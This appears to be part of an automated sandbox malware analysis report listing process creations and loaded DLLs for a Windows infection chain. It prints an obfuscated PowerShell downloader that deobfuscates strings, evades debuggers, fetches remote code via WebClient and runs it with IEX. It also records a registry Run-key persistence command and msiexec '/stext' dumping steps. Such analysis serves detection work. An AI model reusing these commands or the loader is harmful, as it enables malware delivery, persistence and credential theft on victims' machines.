AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kak
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qyucuggstgpeoollwrdamgokovwgtwvpgi"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sahvvz"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Da Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qyucuggstgpeoollwrdamgokovwgtwvpgi" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sahvvz" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdatauser.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
